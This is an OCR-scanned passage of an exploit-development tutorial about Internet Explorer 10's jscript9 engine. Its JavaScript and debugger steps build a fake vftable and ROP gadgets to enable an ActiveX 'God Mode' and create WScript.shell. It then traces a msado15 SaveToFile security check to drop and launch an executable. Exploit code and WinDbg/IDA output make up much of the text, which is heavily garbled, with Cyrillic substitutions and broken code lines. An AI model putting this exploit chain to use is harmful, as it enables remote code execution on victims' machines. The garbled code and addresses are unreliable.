Well, it turns out that we can control ЕАХ and xchg eax, esp gadgets are certainly more common than xchg 
есх, esp gadgets. 


Here’s the schema we're going to use: 
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vftable eax, esp 
Called in eax, 71F84DCOh 


esi 


CanCreateObject eax, esl П 


Called in 


CanObjectRun 


хог eax, eax 
ret 
xchg  eax, edi 
ret 
leave 4 
ret 4 14 | 





We already know that and call virtual functions from the same VFTable. 
You can easily verify that not only do they call virtual functions from the same VFTable, but they call them on 
the same object. This is also shown in the scheme above. 


Let's look again at the relevant code in 


04dcc338 8b08 mov 

04dcc33a 6a00 push 

04dcc33c 6a00 push 

04dcc33e 6a10 push 

04dcc340 #7508 push dword ptr [ebp+8] 
04dcc343 8d55f8 lea edx,[ebp-8] 
04dcc346 6a04 push 4 

04dcc348 52 push едх 

044сс349 6800120000 push 12008 
04dcc34e 50 push eax 


04dcc34f #5110 call dword ptr [ecx* 10h] < са! to gadget 1 (іп the picture) 
04dcc352 85c0 test eax,eax 

04dcc354 7814 js jscript9!ScriptEngine::CanCreateObject+0x55 (04dcc36a) 
04dcc356 f645f80f test byte ptr [ебр-8],ОРЋ 
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04асс3З5а ба00 ризћ 0 

04dcc35c 58 рор еах 

04dcc35d 0194с0 зеје а! 

04dcc360 5f pop edi 

04dcc361 c9 leave this is gadget 4 
04dcc362 с20400 ret 


The first gadget, when called, make ESP point to object+4 and returns to gadget 2. After gadget 2 and 3, 
EDI is 0 and EAX non-zero. Gadget 4 restores ESP and returns from CanCreateObject. 


Here’s the javascript code to set up object and vftable like in the picture above: 


JavaScript 


var pp_ obj = ... ptr to ptr to object ... 


var old_objptr = read(pp obj); 
var old_vftptr = read(old_objptr); 


var new_vftable = new Int32Array(0x708/4); 
for (var i = 0; i < new vftable.length; ++i) 
new vftable[i] = read(old vftptr + i*4); 
new vftable[0x10/4] = jscript9+0x10705e; 
new vftable[0x14/4] = јѕсгірі9+0хас164; 
var new vftptr = read(get addr(new vftable) + Ox1c); 


var new object = new Int32Array(4); 
new object[0] = new vftptr; 


expdev-kiuhnm.rhcloud.com 





EXPLOIT DEVELOPMENT COMMUNITY 





The code should be easy to understand. We create object (new object) and vftable (new vftable) by using 
two Int32Arrays (in particular, their raw buffers) and make object point to vftable. Note that our vftable is a 
modified copy of the old уНаЫе. Maybe there's по need to таке а сору of the old vftable because only the 
two modified fields (at offsets 0x10 and 0x14) are used, but that doesn't hurt. 


We сап now enable the God Mode by making EAX point to our object and disable the God Mode by making 
EAX point to the original object. 


Controlling EAX 


To see if we can control EAX, we need to find out where the value of EAX comes from. | claimed that EAX 
can be controlled and showed how we can exploit this to do some ROP. Now it’s time for me to show you 
exactly how EAX can be controlled. In reality, this should be the first thing you do. First you determine if you 
can control something and only then write code for it. 


It's certainly possible to do the kind of analysis required for this task in WinDbg, but IDA Pro is way better for 
this. If you don't own a copy of IDA Pro, download the free version (link). 


IDA is a very smart disassembler. Its main feature is that it's interactive, that is, once IDA has finished 
disassembling the code, you can edit and manipulate the result. For instance, you can correct mistakes 
made by IDA, add comments, define structures, change names, etc... 


If you want a career in Malware Analysis or Exploit Development, you should get really comfortable with IDA 
and buy the Pro version. 


CanCreateObject is in jscript9. Let's find out the path of this module in WinDbg: 


0:015> Imf m jscript9 


start end module name 


71c00000 71ес6000 jscript9 C:\Windows\SysWOW64\jscript9. ан 





Open jscript9.dll in IDA and, if needed, specify the path for the database created by IDA. When asked, allow 
IDA to download symbols for jscript9.dll. Press CTRL+P (Jump to function), click on Search and enter 
CanCreateObject. Now CanCreateObject should be selected like shown in the following picture: 
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Choose function to jump to 


Function r 


Js:PropertyRecord const *,Recycler... . 
( ynamicObject *,long,void. 


ptExternalOperators: 
nt Р 


WeaklyReference yDictionary «Js:PropertyRecord,in... . 
Util: WeaklyReferencedKeyDictionary «Js;PropertyRecord in... . 


ptSite:AddDispatchCount(void) 


opertyRecord const * Recycler... 


[F] HostDispatch:InvokeMarshalec 
[7] HostDispatch::GetPropertyReference 


[7] HostDispatc! 


S 
AS 


у SSSSSSss 


Line 3149 of 12404 


After you double click оп 


see linear code, hit the spacebar. To rename a symbol, click on it and press 


Segment 


Start 
100DB299 
100DB2FB 


100DB50A 
100DB565 
100DB683 
1 " 


10 0 
100DB7EO 
100DBA81 
100DBAC7 
10008885 
ТОООБСАЗ 
100DBCCD 
100DBD8B 
100DBECB 
100DBFE1 
100DBFEF 
100DBFFE 
100DCOB5 
100DC17D 
100DC315 


Cancel 


Locals Arguments 


00000010 
00000038 


0 
00000014 
0004 


00000018 0000000 


00000024 


0 1 
00000059 


you should see the graph of the function 


. IDA has a very useful 


=== == = = = ч: 





. If you 


feature: when some text is selected, all occurrences of that text are highlighted. This is useful to track things 


down. 


Have a look at the following picture: 
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This suggests that [ебр+објес 15 
modified inside the following call 




































































It's quite clear that (note that | renamed to ) is modified 
inside . Let's have a look at that function: 
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; _int32  thiscall ScriptEngine::GetSiteHostSecurityManagerHoRefF(ScriptEngine «this, struct IInternetHostSecurityHanager жәр object) 
?GetSiteHostSecurityHanagerHoRefBScriptEngineBBIREJPAPRUIInternetHostSecurityManagerGGG?2 proc near 


We can conclude that uA du pointer to object (object will 
object = [edi 1F0h be modified 


; FUNCTION CHUNK AT 10166920 SIZE 8000000Р BYTES 


edi, edi 

ebp 

ebp, esp 

есх 

eax, [ebprp object] 
esi 

esi, esi 

[eax], esi 

[ейі •1Е8ћ], esi 
short loc 1000С3Е7 





nou ecx, [edi+70h] 
test | ecx, есх 
је short loc 1000С3Е7 















, [ебї+1Ейһ] 
1, esi 
short loc 18805388 
















loc 100DC3AR: 
вах, [ecx] 

edx, [ebpevar 4] 
edx 
offset 110 ISeruviceProuider 
PCX 
dword ptr [eax] 
esi, eax 
esi, esi 
Тос_10166920 






If [edi 1FOh] is 0, 
this part initializes it 
1... -------- Pax, [ebpsvar 31 
ecx, [eax] 


edx, offset 110 IInternetHostSecurityHanager 
edx 

edx 

вах 

dword ptr (ескей | 
esi, eax 

eax, [ebpsuar h] 
ecx, [eax] 

eax 

dword ptr [ecx*«8] 
esi, esi 

short loc 10000398 


; START OF FUNCTION CHUNK FOR ?GetSiteHostSecurituHanagerHoRefB8ScriptEngineBBaIREJPRPRUI InternetHostSecuri tyManagerGae2 


loc 18166920: 
dword ptr [edi*1ESh], 1 
loc 1800398 





вах, 800040051 
і short loc 10800345 
?GetSiteHostSecurityManagerNoRef@ScriptEngine@@l AE JPAPAUI InternetHostSecurityNanager@aaz endp 


[edi+1 Fon 


As we can see, our variable is overwritten with . We also see that if is 0, it’s 
initialized. We need to keep this fact in mind for later. Now that we know that we need to track edi, let’s look 
again at 





; int  thiscall ScriptEngine::CanCreateÜbject(ScriptEngine xthis, const struct GUID x) 
?CanCreateübject&8ScriptEngine(xsQREHRBU GUIDGX332 proc near 


yte ptr -8 
dword ptr -4 
ағд 8- dword ptr 8 


edi, edi 

ebp 

ebp, esp 

ecx 

ecx 

edi 

edi, eax| 

byte ptr [edi+1E4h], 8 
short loc 188DC365 





eax, [ebptobject] 

вах = D object 
?&etSiteHostSecurityhanagerHoRefFBScriptEnginel34IREJPRPAUIInternetHostSecurityHanagertxa2 
вах, edn 

short loc 188DC36R 





eax, [ebptobject] 
ecx, [eax] 
8 


8 

18h 

[ebp*arg 8] 

edx, [ебр+џак_8] 
2 


edx 

12881 

вах 

dword ptr [ecx«18h] 
Pax, eax 

short loc 18900369 











loc 1868DC36h: 

xor eax, еах 1 вах, вах 

jnp short loc 18800360 i eax 
?CanCreateObject@ScriptEngine@@aqgaEHABU_GUID@@BZ2 endp| |j short loc 188DC368 








To see what code calls , click somewhere where indicated in the picture above and press 
. Then select the only function shown. We're now in 
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. .int32  thiscall ScriptSite::CreateübjectFronProgID(ScriptSite ж hidden this, const unsigned _ intió ж, const unsigned 18116», struct IUnknoun жж) 
?ÉreateübjectFronProgIDGScriptSite&eQaEJPBGPAPRUIUnknounG eZ proc near 


dword pt 

dword pt 

мома ре 

dword pt 

dword pt 

AH dword pt 
рру= dword ptr ~ 


к -34h 
r -38h 
ғ -2Ch 
r -28h 
ғ -24h 
ғ -28h 
100 


|puReserueds dword ptr -18h 


clsid= CLSID ptr 
var h- dword ptr 
arg 8- dword ptr 
arg = duord ptr 


FUNCTION CHUNK 
FUNCTION CHUNK 
FUNCTION CHUNK 


-14h 
-4 
8 
ach 


ЯТ 1888278F SIZE 88880BBR BYTES 
AT 18166910 SIZE 88880818 BYTES 
RT 182529E6 SIZE 08000075 BYTES 


. security cookie 

ebp 
[ebptvar_4], eax 
ebx 
ерх, [ebptarg 4] 
esi 


eax, вах 
i 


р struct ScriptSite + 


; struct SiteService =» 


ESI comes from EDX. 
Now we need to follow EDX 


[ebp+var За], eax 
Tebpwar 30], edi 
[ebp*var 26), eax 
[ebp*var 28], eax 
[ebp*puReserved], eax 


edi, edi 


loc 102529E6 


Here's the next step: 


eax 7 [esi*4] | 
Now we must follow ESI. | 








; START OF FUNCTION CHUNK FOR ?Create0bjectFromProg I D@Scriptsite@@gaAc JPBGOPAPARUTUnknounisX? 


loc 182429E6: 
eax, [ebp«var 34] 
[ebp+puReserved], eax 
loc_108DBF 04 


Esis] 
TInSafeHode(iScriptEngine&GGgREHN2 ; ScriptEngine::InŝafeMode(void) 
вах, гах 
eax, [ebp+clsid] 
eax ; Ірсісій 
ecx ; lpszProgIb 
loc 1825429F1 









call _ imp CLSIDFromProgID88 ; CLSIDFromnProgID(x,x) 






loc 182529F1: ; CLSIDFronProgIDEx(x,x) 
. imp CLSIDFronProgIDEx8S 
loc 188DBF1F 






eax, вах 


t 
loc 100827 OF We're here and ме 





need to follow EAX 


lea вах, [ebp«cisid] 


; struct  GUID 
pov — es Таз 231 
цараа CLIE EPI JL at da ptEnginetbxSQAEHRBU СИТ 02 


зас” '1000270Е 












; ScriptEngine::CanCreateÜbject( GUID const 6) 








вах 
edi, edi 
loc 182529FC 





This is what we've learned so far: 


esi = edx 


eax - [esi*4] 


edi = eax 


object = [edi+1f0h] 





Now we need to go to the caller of and follow . To do that, click somewhere 
on the signature of and press . You should see two options: of course, 
select . Now мете inside : 





; void ж thiscall Scriptsit CreateActivexObject(ScriptSite «this, const unsigned | intió «Ёо #01100, ScriptSite ж) 
?CreateRctiuvexXUbjectBScriptsite(3QREPRXPBGORZ proc near 


dword ptr -2hh 
byte ptr -1Ch 
мога ptr -18һ 
dword ptr -14h 
duord ptr -10h 
мога ptr -4 
ollow- dword ptr 8 
duord ptr 6Ch 
dword ptr 18h 


18h 
вах, offset sub 10882719 


[ebp*arg 8], 8 

ebx, [ebp+to Follow] 
ебх, [ebx«5hh] 

loc 18243818 





loc 18253818: 

ecx, [ebx+484n] 
?IsConpatUersion8a8Scripttonfiguration&gJs(aQBE н: 
al, al 

10с 18808087 


loc 18808087: ; void * 
ecx, ebx 
esi, [ebp*var 18] 
2767 $AutoLeaveScriptPtr@UI Unknown@@@@QAE@PAUScriptContext@Js@@PAUIUnkn own@aea2z 
[ebp*var 4], 8 
[ebpevar 18], 8 
[ebp*var 18], ebp 
eax, [ebpsvar 24] 
eax 
eax, [ebp*var 18] 
есх, ерх 
??68?$LeaveScriptübjecta$ 886 ова саа) 
eck, TSh ward NI ; this to follow (argo) 


zUünsigned intis ж 
; unsigned — 1016 > 


?UCFeateUbjectFronProgIDGScriptsitegGQnREJPBG OPAPAU | ПКПо 442 
byte ptr [ebpevar 1], 8 

[ebp*var 161, 8 

edi, eax 

short loc 188DBE32 
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Let's update our little schema: 


esi = ага0 


edx = esi 
esi = edx 
eax = [esi*4] 
edi = eax 


object = [edi-- 1fOh] 





Now we need to follow the first argument passed to . As before, let's go to the code 
which calls . Look а the following picture (note that | grouped some nodes together to 
make the graph more compact): 





; void ж high static Javascriptactivexobject::NewInstance(struct Js::RecyclableObject ж, struct Js::CallInfo, 
?NewInstance@Javascriptactivex0b ject@@sAPAXPAURecyclable0b ject@Js@@UCall Info@3@22 proc near 


lvar_10- dword ptr -10h 
to follou- awora ptr -ocn 
duord ptr 
ашога ptr 
dword ptr 
dword ptr 
byte ptr 


edi, edi 

ebp 

ebp, esp 

esp, OFFFFFFF8n 

esp, 14h 

ebx 

esi 

edi 3 void ж 

eax, [ebptarg 8] 

eax ; struct Js::CallInfo > 
edi, [ebptarg 4] 

esi, [esp+24h+var_8] 

2? 0ArgumentReader@Js@@QAE@PAUCal] Info@1@PAPAX@Z 
[ebprarg н], 10099908 

eax, [ebpsarg 8] 

eax, [еах+281] 

есі, [eaxroun] 

[esp*20n«to Follow], eax 

Тос 18227990 











esi ; struct Js::ScriptContext ж H 
dword ptr [edi+8] ; void х loc 10166805: 
?ToString&JavascriptConversiongJsGGSGPRUJavascriptStringG2GPaXPRUScriptContextG2GG2 ; _ loc 1016688F: ; unsigned | intió > push ерх 

edx, [eax] push 0 jmp short loc 18166891 
есх, вах 

duord ptr [edx+134n] 

ecx, [esp*28h«var 181 

ebx, eax 

loc 10008055 














loc 100DBD55: loc 10166891 loc 10166890: 
nov eax, [ecx] 800A138Dh push в loc 1823F998: 
push ебх push | 808001Cih push в 
dword ptr [eax+134h] jmp short loc 18166896| push вевавівоһ 
esi, [esp*24n+to Follow] jmp loc 10166896 
тах 2 Scriptsite > 
esi ; to follow 
Treat enctivexub ject@scriptsitem@aqnePANPBG 982 
esi, (65155811 
duord ptr [esi+4194n], 808008. 
edi, eax 
27$Col Lect Now@$ 68 IRBBRaDGGRecyclerGaQaEHXZ 
eax, edi 
edi 
esi 
ebx 
esp, ebp 
ebp 


?NewInstance@Javascriptactivex0bject@asaPAaxPAURecyclableObject@Js@@aUCallInfo@3@zz endp 
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After this, the complete schema is the following: 


eax = arg_0 


eax = [eax*28h] 


edx = eax 

esi = edx 

eax = [еѕі+4] 

edi = eax 

object = [edi+1f0h] 





Now we must follow the first argument passed to JavascriptActiveXObject::Newlnstance. When we click on 
its signature and press CT RL+X we're shown references which doesn't look familiar. It’s time to go back in 
WinDbg. 


Open in IE a page with this code: 
XHTML 





When the breakpoint is triggered, let's step out of the current function by pressing Shift* F11, until we are in 
jscript9!Js::InterpreterStackFrame::NewScObject Helper. You'll see the following: 

045725c4 890c82 mov  dword ptr [edx*eax*4],ecx 

045725c7 40 inc eax 

045725с8 3bc6 cmp eax, esi 


045725ca 7215 jb —_jscript9!Js::InterpreterStackFrame::NewScObject_Helper+Oxc2 (045725c1) 
045725cc #75ес push dword ptr [ebp-14h] 
045725cf ff75e8 push dword ptr [ebp-18h] 
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04572542 ff55e4 са! dword ptr [ebp-1Ch] 
04572545 8665е0 mov esp,dword ріг [ебр-201] ss:002b:03a1bc00=03a1bbe4 < we're here! 
04572548 8945d8 mov (м/га ptr [ebp-28h],eax 


045725db 8b4304 mov  eax,dword ptr [ебх+4] 
045725de 83380d стр dword ptr [eax],ODh 





We can see why IDA wasn't able to track this call: it's a dynamic call, meaning that the destination of the call 
is not static. Let's examine the first argument: 


0:007> аа poi(ebp-18) 

032e1150 045e2b70 03359ас0 03355520 00000003 
032e1160 00000000 ffffffff 047c4de4 047c5100 
032e1170 00000037 00000000 02cc4538 00000000 
032e1180 0453babc 00000000 00000001 00000000 
032e1190 00000000 032f5410 00000004 00000000 
032е11а0 00000000 00000000 00000000 00000000 
032e11b0 04533600 033598c0 033554е0 00000003 
032е11с0 00000000 ffffffff 047c4de4 047c5660 





The first value might be a pointer to a vftable. Let's see: 


0:007» In 045e2b70 
(045e2b70) jscript9! JavascriptActiveXFunction::? vftable' | (04534218) jscript9!Js::JavascriptSafeArrayObject:: vftable' 
Exact matches: 


jscript9! JavascriptActiveXFunction:: vftable' = «no type information? 





And indeed, we're right! More important, JavascriptActiveXFunction is the function ActiveXObject we use to 
create ActiveX objects! That's our starting point. So the complete schema is the following: 


X = address of ActiveXObject 
X = [X+28h] 


X = [X+4] 
object = [X+1f0Oh] 





Let’s verify that our findings are correct. To do so, use the following javascript code: 
XHTML 
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rip language-"je 
Array(0x200 
= 0; i < 0x2000; ++i) { 


ем Аггау((0х10000 - 0х20)/4); 
г) = 0; | < 0x1000; ++ј) 
[illi] = ActivexObject; 





Open it in IE and in WinDbg examine the memory at the address 0xadd0000 (or higher, if you want). The 
memory should be filled with the address of ActiveXObject. In my case, the address is 03411150. Now let's 
reach the address of object: 

0:002» 2 poi(03411150+28) 

Evaluate expression: 51132616 = 030c38c8 

0:002» ? роі(030с38с8+4) 


Evaluate expression: 51075360 = 03065920 
0:002> 2 ро(030р5920--110) 
Evaluate expression: 0 = 00000000 





The address is 0. Why? Look again at the following picture: 
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Ши 





; Attributes: bp-based frame 





; | int32  thiscall ScriptEngine: :GetSiteHostSecurityHanagerNoRef(ScriptEngine «this, struct IInternetHostSecuritylanager өөр object) 
?GetSiteHostSecurityHanagerHoRef&ScriptEngine&BRIAREJPRPAUIInternetHostSecurityManagert(34932 proc near 





-ң 4 Е = 5 
We can conclude that TENTER pointer to object (object will 
object = [edi+1FOh] be modified) 

; FUNCTION CHUNK AT 1816692D SIZE 0880880Е BYTES 

mov edi, edi 

push ebp 

nov ebp, esp 

push есх 

пау eax, [ebp*p object] 

push esi 

xor 251, esi 

nou [eax], esi 

cnp [edi+1E8h], esi 

jnz short loc 18BDC3E7 





Ш са 2 

пау ecx, [edi+76h] 
test есх, есх 

jz short loc 188DC3E7 





















23 [edi+1F6h] 
[ebX], esi 


short loc_166DC3AA 















loc_100DC3AA: 





nov eax, [ecx] 

lea edx, [ebptuar_ 4] 

push edx 

push offset 110 IServiceProvider 
push ecx 

call duord ptr [eax] 

nou PSi, eax 


test esi, esi 
loc 1816692D 








If [edi+1FOh] is 0, | 
this part initializes it 
eax, [ebp+yar_4] 

ecx, [eax] 


edx, offset ІІІ IInternetHostSecurityHanager 
edx 

edx 

eax 

шога ptr [ecx+8Ch] 
esi, eax 

eax, [ebpsvar ^] 
ecx, [eax] 

eax 

dword ptr [есх+8] 
esi, esi 

short loc_166DC39B 





loc 1816692D 





loc 10166920: 

mou dword ptr [edi*1E8h], 1 

jnp loc 188DC39B 

; END OF FUNCTION CHUNK FOR ?GetSiteHostSecurityManagerNoRef@ScriptEngine@@lAEJPAPAUL InternetHostSecurityManager@aaz 





loc 188DC39B: loc 188DC3E7: 
nou nou eax, 890040051 






object is modified 


: | mou есх р+р object | | jmp short 10с 18800885 
and overwritten with | =. |mu [ecx]. вах | ?GetSiteHostSecurityHanagerMoRef(üScriptEngine&eIREJPAPRUIInternetHostSecurityhanager&aa2 endp 


једн ТЕОНЈ 
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So, to initialize the pointer to object, we need to call CanCreateObject, i.e. we need to create an ActiveX 
object. Let's change the javascript code this way: 


XHTML 


language="javascript" 
'eXObject("WScript.shell"); 
rray(0x2000); 
i i < 0x2000; ++i) { 
ew Array((0x10000 - 0x20)/4); 


( 
2) 


« 0х1000, ++) 





Repeat the process and try again to get the address of the object: 


0:005» ? роі(03411150+28) 

Evaluate expression: 51459608 - 03113618 

0:005» ? роі(03113618+4) 

Evaluate expression: 51075360 - 030b5920 

0:005» ? poi(030b5920--1f0) 

Evaluate expression: 6152384 = 005de0cO 

0:005> dd 005de0c0 

0054е0с0 6d0f55e0 00000001 6c4d7408 00589620 
0054е040 6c532ac0 00000000 00000000 00000000 
005de0e0 00000005 00000000 3fd6264b 8c000000 
0054е0(0 005579b8 005de180 00557958 5e6c858f 

005de100 47600e22 33eafe9a 7371b617 005a0a08 
005de110 00000000 00000000 3fd62675 8c000000 
005de120 005882d0 005579e8 00556600 5e6c858f 
005de130 47600e22 33eafe9a 7371b617 005ce140 
0:005> Іп 690155е0 
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(6d0f55e0) MSHTML!s_ apfnPlainTearoffVtable | (6d0f5ce8) MSHTML!s_apfnEmbeddedDocTearoffVtable 


Exact matches: 
MSHTML!s_apfnPlainTearoffVtable = <no type information> 





Perfect: now it works! 
Now we can complete our javascript code: 
JavaScript 
r old = read(mshtml+0xc555e0+0x14); 
write(mshtml+0xc555e0+0x14, jscript9--0xdc164); 
ar shell =! ActivexObject("W Script.shell"); 
write(mshtml*0xc555e0-0x14, old); 


addr = get addr(ActiveXObject); 





pp. obj = read(read(addr + 0x28) + 4) + 0х1#0; 


Note that we can use the “old” God Моде to create 
Неге'5 the full code: 
XHTML 


«html» 

«head» 

<script language="javascript"> 
(function() { 

alert("Starting!"); 


(i = 0; i < Ox300; ++i) { 
i Array(0x3c00); 
0x100) 
ArrayBuffer(0x58); 
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for (j = 0; j < a[i].length; ++j) 
a[i][j]] = 0x123; 
) 


for (; i < 0x300 + 0x400; ++i) ( 
ali] = new Array(Ox3bf8) 
for (| = 0; | < 0x55; ++)) 
a[i][]] = new Int32Array(buf) 


alert("Set byte at OcOaf01b to 0x20"); 


int32array - 0; 
for (i = 0x300; i « 0x300 + 0x400; ++i) ( 
for (| = 0; | < 0x55; ++]) { 
if (a[i][j].length != 0x58/4) { 
int32array = a[i][j]; 
break; 


} 


} 
if (int32array != 0) 
break; 


} 


if (int32array == 0) { 
alert("Can't find int32array!"); 
window. location.reload(); 
return; 


} 
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[0x60/4], 
2array[0x60*2/4], 
[0x60*3/4], 
array[(0x60+0x24)/4], 
'array[(0x60*2--0x24)/4], 
ac [(0x60*3--0x24 4]; 
& Oxffff != Охбе18 || vftptr1 != vfi 
| |= 0x60 || 


(0: 


r1 - 0х60*2; 


[(OxOcOaf000-0x1c - buf. а 


id(); 


earl" 


nt32array[(0x0cOaf000--0x18 - buf_addr)/4] = 0x20000000; 
132аггау(ОхОсОа 000-0х1с - bu агу4] = 0; 


){ 
&3; 


-k)/4] >> k*8) | 
-k+4)/4] << (32 - 
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= read(0xOcOaf000) - 0x3b60; 


for (i = 0x200; i < 0х200 + 0x400; ++) 
[i][0x3bf7] = 0; 


(0х0с0а#000-4, 3); 


for (i = 0x200; i < 0x200 + 0x400; ++) { 


if (a[i][Ox3bf7] != 0) ( 
КАггау = а; 


iddr(obj) ( 
[Ox3bf7] = obj; 
I(OxOcOaf000-4, obj); 


Ir( Im lt ес m ||| 
Ir + 0x10) - 0x58b9a; 


http: 
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l(mshtml*0xc55560-0x14); 


nshtml+0xc555e0+0x14, јѕсгірі9+0хас164); 
пе! ‘Ob "MV shell"); 


јен ew АСИ ^ ( VV 
nshtml+0xc555e0+0x14, old); 


Ir(ActiveXObject); 
id(read(addr + 0x28) + 4) + Ox1f0; 


bj); 
bjptr); 


(0х708/4), 
| Жий 
ble[i] = read(old уй рг + 14); 
le[0x10/4] *0x10705e; 
le[0x14/4] +0хас164; 
= read(get_addr( 


) + 0х15(800: 
) + Oxf3baf; 

+ 0xdc361; 

t id (n 
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| snipped . You can download the full code from here: code2. 


If you open the html file in IE without using SimpleServer, everything should work fine. But if you use 
SimpleServer and open the page by going to in IE, then it doesn't work. We've seen this error 
message before: 
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File Find Disable View Images Cache Tools Validate | Browser Mode: IE10 Document Mode: Quirks 

HTML CSS Console Script Profiler Network 

[ SU [KÈ Start debugging onsole Watch ^ Locals Са! аф: | Breakpoints 
http:// 


tStream.Open(); 
bStream.Open(); o SCRIPT3716: Safety settings on this computer prohibit accessing a data source on another domain 
tStream.Writelext(data); 





// skips the first 2 bytes in 


/) 2 = overwrites fil 





a 
tStream.Close(); 
bStream.Close(); 


decode(b64Data) { 


Crossing Domains 
The line of code which throws the error is the one indicated here: 


JavaScript 


// text 
// binary 


// skips the first 2 bytes in the tStream (what are they?) 
am); 





The error message is “ 
“. So, let's reload our html page using SimpleServer, change the length of the 
and let the code throw the error. We note that some additional modules were loaded: 
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ModLoad: 0eb50000 0eb71000 C:\Windows\SysWOW64\wshom.ocx 

ModLoad: 74940000 749е2000 C:\Windows\SysWOW64\MPR.dll 

ModLoad: 0eb80000 0ebaa000 C:\Windows\SysWOW64\ScrRun.dll 

ModLoad: 0ebb0000 Оесо#000 C:\Windows\SysWoOW64\SXS.DLL 

ModLoad: 6e330000 6e429000 C:\Program Files (x86)\Common Files\System\ado\msado15.dll < 
ModLoad: 72100000 72f1f000 C:\Windows\SysWOW64\MSDART.DLL 


ModLoad: 6e570000 6e644000 C:\Program Files (x86)\Common Files\System\Ole DB\oledb32.dll 
ModLoad: 74700000 74717000 C:\Windows\SysWOW64\bcrypt.dll 

ModLoad: 72150000 72164000 C:\Program Files (x86)\Common Files\System\Ole DB\OLEDB32R.DLL 
ModLoad: 738с0000 738с2000 C:\Program Files (x86)\Common Files\System\ado\msader15.dll < 
(15bc.398): C++ EH exception - code e06d7363 (first chance) 

(15bc.398): C++ EH exception - code e06d7363 (first chance) 





Two modules look particularly interesting: msado15.dll апа msader15.dll. Theyre located in the directory 
ado. It doesn't take a genius to understand, or at least suspect, that those modules are related to ADODB. 


Let's see if we can find a function named SaveToFile in one of those two modules: 


0:004» x msad*!*savetofile* 
6e3e9ded msado15!CStream::SaveToFile (<no parameter info>) 


6e3ccf19 msado15!CRecordset::SaveToFile (<no parameter info>) 





The first function seems to be what we’re looking for. Let's put a breakpoint on it and reload the page. As we 
hoped, the execution breaks on msado15!CStream::SaveToFile. The name of the function suggests that the 
module is written in C++ and that SaveToFile is a method of the class CStream. ES! should point to an 
object of that class: 


0:007> dd esi 
Oedbb328 6e36fd28 без 61900 6e36fcf0 беЗЗасав 


Oedbb338 00000004 00000000 00000000 00000000 
Oedbb348 00000000 00000000 00000000 беЗбїсеО 


Oedbb358 6e33acc0 беЗбіссс 00000000 00000904 
Oedbb368 00000001 04e4c2bc 00000000 6e36fc94 
Оедрр378 Оеарр308 00000000 Oedbb490 00000000 
Oedbb388 00000001 ffffffff 00000000 00000000 
Oedbb398 00000007 000004b0 00000000 00000000 
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0:007» In poi(esi) 


(6e36fd28) msado15!ATL::CComObject<CStream>:: vftable' | (6e36fdb8) msado15! CStream:: беЕппез':: 2':: 161111: 
5 


Exact matches: 


msado15!ATL::CComObject<CStream>:: vftable' = «no type information? 





OK, it seems we're on the right track. 

Now let's step through SaveToFile to find out where it fails. During our tracing we come across a very 
interesting call: 

беЗеа0а9 018496000000 је msado15!CStream::SaveToFile+0x358 (6e3ea145) 

6e3ea0af 50 push eax 

6e3ea0b0 53 push ерх 

беЗеа061 е881940000 call тѕаао15!5есигіїуСһеск (6е313545) 

безеаорб 83c408 ааа еѕр,8 

6e3ea0b9 85c0 test eax,eax 

беЗеаобб 018484000000 jge тѕаао15!С5ігеат::ЅауеТоЕііе+0х358 (безеа145) 





SecurityCheck takes two parameters. Let's start by examining the first one: 


0:007> dd eax 

04e4c2bc 00740068 00700074 002f003a 0031002f 
04e4c2cc 00370032 0030002e 0030002e 0031002e 
04e4c2dc 0000002f 00650067 00000000 6ff81c09 
04e4c2ec 8c000000 000000e4 00000000 00000000 
04e4c2fc 0024d46c 0024d46c 0024cff4 00000013 
04е4с30с 00000000 00001 0с000001 00000000 
04e4c31c 00000000 6ff81c30 88000000 00000001 
04e4c32c 0024eee4 00000000 6а746821 61202c6c 





Mmm... that looks like a Unicode string. Let's see if we're right: 


0:007» du eax 


O4e4c2bc "http://127.0.0.1/" 





That's the URL of the page! What about ебх? Let's see: 
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0:007> dd ebx 

001d30c4 003a0043 0055005c 00650073 00730072 
001d30d4 0067005c 006e0061 00610064 0066006c 
001d30e4 0041005c 00700070 00610044 00610074 
001d30f4 004c005c 0063006f 006c0061 0054005c 
00143104 00640065 005c0070 006f004c 005c0077 


00143114 00750072 0063006e 006c0061 002е0063 
001d3124 00780065 00000065 00000000 00000000 
001d3134 40080008 00000101 0075006f 00630072 
0:007» du ерх 

001d30c4 "CAUsersYgandalf'AppData WV ocalT" 
001d3104 "emp\Low\runcalc.exe" 





That's the full path of the file we're trying to create. Is it possible that those two URLs/paths are related to the 
domains the error message is referring to? Maybe the two domains are http://127.0.0.1/ and CA. 


Probably, SecurityCheck checks that the two arguments represent the same domain. 


Let’s see what happens if we modify the first parameter: 


0:007> еги @еах "C:\\" 
0:007> аи @еах 


04e4c2bc "C:\" 





The command ezu is used to (e)dit a (z)ero-terminated (u)nicode string. Now that we modified the second 
argument, let's resume execution and see what happens. 


The calculator pops up!!! Yeah!!! 


Now we need a way to do the same from javascript. Is it possible? The best way to find out is to 
disassemble msado15.dll with IDA. Once in IDA, search for the function SecurityCheck (CTRL+P and click 
on Search), then click оп the signature of SecurityCheck, press CTRL+X and double click оп 
CStream::SaveToFile. Function SaveToFile is huge, but let's not worry too much about it. We just need to 
analyze a very small portion of it. Let's start by following the second argument: 
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As we can see, БАХ comes from [ES!+44h]. ESI should be the pointer this, which points to the current 
CStream object, but let's make sure of it. In order to analyze the graph more comfortably, we can group all 
the nodes which are below the node with the call to SecurityCheck. To do so, zoom out by holding down 
CTRL while rotating the mouse wheel, select the nodes by holding down CTRL and using the mouse left 
button, and, finally, right click and select Group nodes. Here’s the reduced graph: 
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128 шш [5] 


Attributes: bp-based frame 


Е int32 — stdcall CStream::SaueToFile(CStream «this, unsigned _ inti6á ~, DWORD dwCreationDisposition) 
7TSaueToFile(atStreamisalhn6.JIPaGWhsaueüptionsEnumsXa27 proc near 


NumberOfBytesWritten= dword ptr —956h 
bstrstring- dword ptr -94Ch 

uar 958- byte ptr -9948h 

uar 9309= dword ptr -93ü8h 

саг 920- dword ptr —92Ch 

мағ 924— dword ptr —92u4h 

5Ек2- dword ptr -9208h 

чаг 91С- dword ptr -91Ch 
nHumberüfBytesToWrite- dword ptr -918Һ 
саг 91ң- dword ptr -9184h 

hübject- dword ptr —-916h 

Buffer= byte ptr -96Ch 

HultiByteStr- byte ptr -1üCh 

сар 8= byte ptr -8 

uar ң- dword ptr -4 

this- dword ptr 8 

arg Ээ dword ptr ach 
duCreationDisposition= dword ptr 18h 


mov edi, edi 

push ebp 

mov ebp, esp 

sub esp, 956h 

том eax, security cookie 
хок eax, ebp 

mov [ebp*-var ^], eax 

mou eax, Гей ртагц 5^] 

push 


D L P6 1] 1 
